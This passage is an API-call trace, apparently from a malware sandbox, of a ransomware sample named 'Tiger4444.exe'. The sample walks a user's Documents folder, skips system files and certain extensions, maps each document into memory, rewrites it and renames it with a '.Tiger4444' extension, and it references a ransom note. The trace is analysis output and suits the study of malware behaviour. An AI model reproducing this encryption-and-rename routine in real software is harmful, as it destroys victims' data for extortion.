ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80967a64, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.254] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.254] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.254] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.254] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.254] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.254] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x80967a64, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x80967a64, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80967a64, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.254] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.254] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.254] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1358f40, ftCreationTime.dwHighDateTime=0x1d4abda, ftLastAccessTime.dwLowDateTime=0x8b74c200, ftLastAccessTime.dwHighDateTime=0x1d50ade, ftLastWriteTime.dwLowDateTime=0x8b74c200, ftLastWriteTime.dwHighDateTime=0x1d50ade, nFileSizeHigh=0x0, nFileSizeLow=0x8ecf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3 jiOxfC.xlsx", cAlternateFileName="3JIOXF~1.XLS")) returned 1 [0046.254] lstrcmpiW (lpString1="3 jiOxfC.xlsx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.254] lstrcmpiW (lpString1="3 jiOxfC.xlsx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.254] lstrcmpiW (lpString1="3 jiOxfC.xlsx", lpString2="Tiger4444.exe") returned -1 [0046.254] lstrcmpiW (lpString1="3 jiOxfC.xlsx", lpString2=".") returned 1 [0046.254] lstrcmpiW (lpString1="3 jiOxfC.xlsx", lpString2="..") returned 1 [0046.255] lstrcmpiW (lpString1="3 jiOxfC.xlsx", lpString2="windows") returned -1 [0046.255] lstrcmpiW (lpString1="3 jiOxfC.xlsx", lpString2="bootmgr") returned -1 [0046.255] lstrcmpiW (lpString1="3 jiOxfC.xlsx", lpString2="pagefile.sys") returned -1 [0046.255] lstrcmpiW (lpString1="3 jiOxfC.xlsx", lpString2="boot") returned -1 [0046.255] lstrcmpiW (lpString1="3 jiOxfC.xlsx", lpString2="ids.txt") returned -1 [0046.255] lstrcmpiW (lpString1="3 jiOxfC.xlsx", lpString2="NTUSER.DAT") returned -1 [0046.255] lstrcpyW (in: lpString1=0x30aeadc, lpString2="3 jiOxfC.xlsx" | out: lpString1="3 jiOxfC.xlsx") returned="3 jiOxfC.xlsx" [0046.255] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\3 jiOxfC.xlsx", dwFileAttributes=0x0) returned 1 [0046.255] lstrlenW (lpString="3 jiOxfC.xlsx") returned 13 [0046.255] lstrlenW (lpString="Tiger4444") returned 9 [0046.255] lstrcmpiW (lpString1="OxfC.xlsx", lpString2="Tiger4444") returned -1 [0046.255] lstrlenW (lpString=".dll") returned 4 [0046.255] lstrcmpiW (lpString1="xlsx", lpString2=".dll") returned 1 [0046.255] lstrlenW (lpString=".lnk") returned 4 [0046.255] lstrcmpiW (lpString1="xlsx", lpString2=".lnk") returned 1 [0046.255] lstrlenW (lpString=".ini") returned 4 [0046.255] lstrcmpiW (lpString1="xlsx", lpString2=".ini") returned 1 [0046.255] lstrlenW (lpString=".sys") returned 4 [0046.255] lstrcmpiW (lpString1="xlsx", lpString2=".sys") returned 1 [0046.255] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\3 jiOxfC.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\3 jioxfc.xlsx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.256] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.256] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13770883873) returned 1 [0046.256] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=36559) returned 1 [0046.256] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0046.256] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0046.256] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x91d0, lpName=0x0) returned 0x2c8 [0046.256] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91d0) returned 0xbe0000 [0046.257] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.257] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0046.257] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.257] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0046.257] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.258] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0046.258] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.258] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0046.258] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13771085154) returned 1 [0046.258] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0046.258] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0046.258] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.258] CloseHandle (hObject=0x2c8) returned 1 [0046.258] CloseHandle (hObject=0x260) returned 1 [0046.260] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\3 jiOxfC.xlsx.Tiger4444") returned 49 [0046.260] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\3 jiOxfC.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\3 jioxfc.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\3 jiOxfC.xlsx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\3 jioxfc.xlsx.tiger4444"), dwFlags=0x1) returned 1 [0046.261] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=36560 | out: Addend=0xc6f980) returned 20602800 [0046.261] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4613 [0046.261] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x896cb80, ftCreationTime.dwHighDateTime=0x1d4cdb2, ftLastAccessTime.dwLowDateTime=0xb06efb20, ftLastAccessTime.dwHighDateTime=0x1d4ceb6, ftLastWriteTime.dwLowDateTime=0xb06efb20, ftLastWriteTime.dwHighDateTime=0x1d4ceb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bfXUap4YidEivvL6", cAlternateFileName="BFXUAP~1")) returned 1 [0046.261] lstrcmpiW (lpString1="bfXUap4YidEivvL6", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.261] lstrcmpiW (lpString1="bfXUap4YidEivvL6", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.261] lstrcmpiW (lpString1="bfXUap4YidEivvL6", lpString2="Tiger4444.exe") returned -1 [0046.261] lstrcmpiW (lpString1="bfXUap4YidEivvL6", lpString2=".") returned 1 [0046.261] lstrcmpiW (lpString1="bfXUap4YidEivvL6", lpString2="..") returned 1 [0046.261] lstrcmpiW (lpString1="bfXUap4YidEivvL6", lpString2="windows") returned -1 [0046.261] lstrcmpiW (lpString1="bfXUap4YidEivvL6", lpString2="bootmgr") returned -1 [0046.261] lstrcmpiW (lpString1="bfXUap4YidEivvL6", lpString2="pagefile.sys") returned -1 [0046.261] lstrcmpiW (lpString1="bfXUap4YidEivvL6", lpString2="boot") returned -1 [0046.261] lstrcmpiW (lpString1="bfXUap4YidEivvL6", lpString2="ids.txt") returned -1 [0046.261] lstrcmpiW (lpString1="bfXUap4YidEivvL6", lpString2="NTUSER.DAT") returned -1 [0046.261] lstrcpyW (in: lpString1=0x30aeadc, lpString2="bfXUap4YidEivvL6" | out: lpString1="bfXUap4YidEivvL6") returned="bfXUap4YidEivvL6" [0046.261] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66440 [0046.261] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x56) returned 0xc60fe8 [0046.261] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66448 | out: ListHead=0xc66828, ListEntry=0xc66448) returned 0xc66308 [0046.261] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4208a7b0, ftCreationTime.dwHighDateTime=0x1d4b13a, ftLastAccessTime.dwLowDateTime=0xcd53b640, ftLastAccessTime.dwHighDateTime=0x1d4f283, ftLastWriteTime.dwLowDateTime=0xcd53b640, ftLastWriteTime.dwHighDateTime=0x1d4f283, nFileSizeHigh=0x0, nFileSizeLow=0x127f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cuZF8zNtkH1ph ibNaP.docx", cAlternateFileName="CUZF8Z~1.DOC")) returned 1 [0046.261] lstrcmpiW (lpString1="cuZF8zNtkH1ph ibNaP.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.261] lstrcmpiW (lpString1="cuZF8zNtkH1ph ibNaP.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.261] lstrcmpiW (lpString1="cuZF8zNtkH1ph ibNaP.docx", lpString2="Tiger4444.exe") returned -1 [0046.261] lstrcmpiW (lpString1="cuZF8zNtkH1ph ibNaP.docx", lpString2=".") returned 1 [0046.261] lstrcmpiW (lpString1="cuZF8zNtkH1ph ibNaP.docx", lpString2="..") returned 1 [0046.261] lstrcmpiW (lpString1="cuZF8zNtkH1ph ibNaP.docx", lpString2="windows") returned -1 [0046.261] lstrcmpiW (lpString1="cuZF8zNtkH1ph ibNaP.docx", lpString2="bootmgr") returned 1 [0046.261] lstrcmpiW (lpString1="cuZF8zNtkH1ph ibNaP.docx", lpString2="pagefile.sys") returned -1 [0046.261] lstrcmpiW (lpString1="cuZF8zNtkH1ph ibNaP.docx", lpString2="boot") returned 1 [0046.262] lstrcmpiW (lpString1="cuZF8zNtkH1ph ibNaP.docx", lpString2="ids.txt") returned -1 [0046.262] lstrcmpiW (lpString1="cuZF8zNtkH1ph ibNaP.docx", lpString2="NTUSER.DAT") returned -1 [0046.262] lstrcpyW (in: lpString1=0x30aeadc, lpString2="cuZF8zNtkH1ph ibNaP.docx" | out: lpString1="cuZF8zNtkH1ph ibNaP.docx") returned="cuZF8zNtkH1ph ibNaP.docx" [0046.262] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\cuZF8zNtkH1ph ibNaP.docx", dwFileAttributes=0x0) returned 1 [0046.262] lstrlenW (lpString="cuZF8zNtkH1ph ibNaP.docx") returned 24 [0046.262] lstrlenW (lpString="Tiger4444") returned 9 [0046.262] lstrcmpiW (lpString1="bNaP.docx", lpString2="Tiger4444") returned -1 [0046.262] lstrlenW (lpString=".dll") returned 4 [0046.262] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0046.262] lstrlenW (lpString=".lnk") returned 4 [0046.262] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0046.262] lstrlenW (lpString=".ini") returned 4 [0046.262] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0046.262] lstrlenW (lpString=".sys") returned 4 [0046.262] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0046.262] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\cuZF8zNtkH1ph ibNaP.docx" (normalized: "c:\\users\\fd1hvy\\documents\\cuzf8zntkh1ph ibnap.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.262] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.262] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13771556546) returned 1 [0046.263] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=75766) returned 1 [0046.263] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0046.263] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0046.263] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12b00, lpName=0x0) returned 0x2c8 [0046.263] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12b00) returned 0xbe0000 [0046.264] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.264] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0046.264] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.264] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0046.264] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0046.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0046.265] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13771775646) returned 1 [0046.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0046.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0046.265] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.265] CloseHandle (hObject=0x2c8) returned 1 [0046.265] CloseHandle (hObject=0x260) returned 1 [0046.268] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\cuZF8zNtkH1ph ibNaP.docx.Tiger4444") returned 60 [0046.268] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\cuZF8zNtkH1ph ibNaP.docx" (normalized: "c:\\users\\fd1hvy\\documents\\cuzf8zntkh1ph ibnap.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\cuZF8zNtkH1ph ibNaP.docx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\cuzf8zntkh1ph ibnap.docx.tiger4444"), dwFlags=0x1) returned 1 [0046.269] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=75776 | out: Addend=0xc6f980) returned 20639360 [0046.269] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4615 [0046.269] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 1 [0046.269] lstrcmpiW (lpString1="Database1.accdb", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.269] lstrcmpiW (lpString1="Database1.accdb", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.269] lstrcmpiW (lpString1="Database1.accdb", lpString2="Tiger4444.exe") returned -1 [0046.269] lstrcmpiW (lpString1="Database1.accdb", lpString2=".") returned 1 [0046.269] lstrcmpiW (lpString1="Database1.accdb", lpString2="..") returned 1 [0046.269] lstrcmpiW (lpString1="Database1.accdb", lpString2="windows") returned -1 [0046.269] lstrcmpiW (lpString1="Database1.accdb", lpString2="bootmgr") returned 1 [0046.269] lstrcmpiW (lpString1="Database1.accdb", lpString2="pagefile.sys") returned -1 [0046.269] lstrcmpiW (lpString1="Database1.accdb", lpString2="boot") returned 1 [0046.269] lstrcmpiW (lpString1="Database1.accdb", lpString2="ids.txt") returned -1 [0046.269] lstrcmpiW (lpString1="Database1.accdb", lpString2="NTUSER.DAT") returned -1 [0046.269] lstrcpyW (in: lpString1=0x30aeadc, lpString2="Database1.accdb" | out: lpString1="Database1.accdb") returned="Database1.accdb" [0046.269] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", dwFileAttributes=0x0) returned 1 [0046.271] lstrlenW (lpString="Database1.accdb") returned 15 [0046.271] lstrlenW (lpString="Tiger4444") returned 9 [0046.271] lstrcmpiW (lpString1="se1.accdb", lpString2="Tiger4444") returned -1 [0046.271] lstrlenW (lpString=".dll") returned 4 [0046.271] lstrcmpiW (lpString1="ccdb", lpString2=".dll") returned 1 [0046.271] lstrlenW (lpString=".lnk") returned 4 [0046.271] lstrcmpiW (lpString1="ccdb", lpString2=".lnk") returned 1 [0046.271] lstrlenW (lpString=".ini") returned 4 [0046.271] lstrcmpiW (lpString1="ccdb", lpString2=".ini") returned 1 [0046.271] lstrlenW (lpString=".sys") returned 4 [0046.271] lstrcmpiW (lpString1="ccdb", lpString2=".sys") returned 1 [0046.271] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.271] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.271] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13772413301) returned 1 [0046.271] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=348160) returned 1 [0046.271] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0046.271] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0046.271] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x55300, lpName=0x0) returned 0x2c8 [0046.273] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x55300) returned 0xbe0000 [0046.406] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.406] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0046.406] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.406] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0046.406] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.407] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0046.407] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.407] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0046.407] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13785978904) returned 1 [0046.407] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0046.407] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0046.407] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.410] CloseHandle (hObject=0x2c8) returned 1 [0046.410] CloseHandle (hObject=0x260) returned 1 [0046.416] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.Tiger4444") returned 51 [0046.416] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb.tiger4444"), dwFlags=0x1) returned 1 [0046.486] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=348160 | out: Addend=0xc6f980) returned 20715136 [0046.486] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=135 | out: Addend=0xc6f98c) returned 4617 [0046.486] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0046.486] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.486] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.486] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0046.486] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0046.486] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0046.486] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0046.486] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0046.486] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0046.487] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0046.487] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0046.487] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0046.487] lstrcpyW (in: lpString1=0x30aeadc, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0046.487] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini", dwFileAttributes=0x22) returned 1 [0046.487] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini", dwFileAttributes=0x6) returned 1 [0046.487] lstrlenW (lpString="desktop.ini") returned 11 [0046.487] lstrlenW (lpString="Tiger4444") returned 9 [0046.487] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0046.487] lstrlenW (lpString=".dll") returned 4 [0046.487] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0046.487] lstrlenW (lpString=".lnk") returned 4 [0046.487] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0046.487] lstrlenW (lpString=".ini") returned 4 [0046.487] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0046.487] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68d19690, ftCreationTime.dwHighDateTime=0x1d4c6c5, ftLastAccessTime.dwLowDateTime=0x2d673770, ftLastAccessTime.dwHighDateTime=0x1d4c57d, ftLastWriteTime.dwLowDateTime=0x2d673770, ftLastWriteTime.dwHighDateTime=0x1d4c57d, nFileSizeHigh=0x0, nFileSizeLow=0xe5d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dhSD1u3DH.odt", cAlternateFileName="DHSD1U~1.ODT")) returned 1 [0046.487] lstrcmpiW (lpString1="dhSD1u3DH.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.487] lstrcmpiW (lpString1="dhSD1u3DH.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.487] lstrcmpiW (lpString1="dhSD1u3DH.odt", lpString2="Tiger4444.exe") returned -1 [0046.487] lstrcmpiW (lpString1="dhSD1u3DH.odt", lpString2=".") returned 1 [0046.487] lstrcmpiW (lpString1="dhSD1u3DH.odt", lpString2="..") returned 1 [0046.488] lstrcmpiW (lpString1="dhSD1u3DH.odt", lpString2="windows") returned -1 [0046.488] lstrcmpiW (lpString1="dhSD1u3DH.odt", lpString2="bootmgr") returned 1 [0046.488] lstrcmpiW (lpString1="dhSD1u3DH.odt", lpString2="pagefile.sys") returned -1 [0046.488] lstrcmpiW (lpString1="dhSD1u3DH.odt", lpString2="boot") returned 1 [0046.488] lstrcmpiW (lpString1="dhSD1u3DH.odt", lpString2="ids.txt") returned -1 [0046.488] lstrcmpiW (lpString1="dhSD1u3DH.odt", lpString2="NTUSER.DAT") returned -1 [0046.488] lstrcpyW (in: lpString1=0x30aeadc, lpString2="dhSD1u3DH.odt" | out: lpString1="dhSD1u3DH.odt") returned="dhSD1u3DH.odt" [0046.488] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\dhSD1u3DH.odt", dwFileAttributes=0x0) returned 1 [0046.488] lstrlenW (lpString="dhSD1u3DH.odt") returned 13 [0046.488] lstrlenW (lpString="Tiger4444") returned 9 [0046.488] lstrcmpiW (lpString1="1u3DH.odt", lpString2="Tiger4444") returned -1 [0046.488] lstrlenW (lpString=".dll") returned 4 [0046.488] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0046.488] lstrlenW (lpString=".lnk") returned 4 [0046.488] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0046.488] lstrlenW (lpString=".ini") returned 4 [0046.488] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0046.488] lstrlenW (lpString=".sys") returned 4 [0046.488] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0046.488] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\dhSD1u3DH.odt" (normalized: "c:\\users\\fd1hvy\\documents\\dhsd1u3dh.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.488] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) 